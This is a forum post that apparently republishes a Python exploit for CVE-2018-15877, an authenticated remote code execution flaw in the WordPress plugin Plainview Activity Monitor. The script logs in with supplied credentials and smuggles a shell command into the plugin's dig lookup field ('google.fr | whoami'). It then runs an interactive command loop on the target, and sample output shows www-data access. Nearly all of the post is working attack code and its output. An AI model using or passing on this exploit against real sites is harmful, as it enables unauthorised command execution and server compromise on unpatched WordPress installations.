WordPress Plainview Activity Monitor 20161228 Remote Code Execution

#337
Topic created · 1 Posts · 2 Views
  • # Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)
    # Date: 07.07.2021
    # Exploit Author: Beren Kuday GORUN
    # Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/
    # Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip
    # Version: 20161228 and possibly prior
    # Fixed version: 20180826
    # CVE : CVE-2018-15877
    
    """
    -------------------------
    Usage:
    ┌──([email protected])-[~/tools]
    └─# python3 WordPress-Activity-Monitor-RCE.py
    What's your target IP?
    192.168.101.28
    What's your username?
    mark
    What's your password?
    password123
    [*] Please wait...
    [*] Perfect! 
    [email protected] whoami
    www-data
    [email protected] pwd
    /var/www/html/wp-admin
    [email protected] id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    """
    
    import requests
    from bs4 import BeautifulSoup
    
    def exploit(whoami, ip):
     while 1:
     cmd = input(whoami+"@"+ip+" ")
     url = 'http://' + ip + '/wp-admin/admin.php?page=plainview\_activity\_monitor&tab=activity\_tools'
     payload = "google.com.tr | " + cmd
     data = {'ip': payload , 'lookup' : 'lookup' }
     x = requests.post(url, data = data, cookies=getCookie(ip))
     html\_doc = x.text.split("<p>Output from dig: </p>")[1]
     soup = BeautifulSoup(html\_doc, 'html.parser')
     print(soup.p.text)
    
    def poc(ip):
     url = 'http://' + ip + '/wp-admin/admin.php?page=plainview\_activity\_monitor&tab=activity\_tools'
     myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' }
     x = requests.post(url, data = myobj, cookies=getCookie(ip))
     html\_doc = x.text.split("<p>Output from dig: </p>")[1]
     soup = BeautifulSoup(html\_doc, 'html.parser')
     print("[*] Perfect! ")
     exploit(soup.p.text, ip)
    
    def getCookie(ip):
     url = 'http://' + ip + '/wp-login.php'
     #log=admin&pwd=admin&wp-submit=Log+In&redirect\_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1
     data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'}
     x = requests.post(url, data = data)
     cookies = {}
     cookie = str(x.headers["Set-Cookie"])
    
     for i in cookie.split():
     if(i.find("wordpress") != -1 and i.find("=") != -1):
     cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1]
     return cookies
    
    ip = input("What's your target IP?\n")
    username = input("What's your username?\n")
    password = input("What's your password?\n")
    print("[*] Please wait...")
    poc(ip)
     
    
    
Log in to reply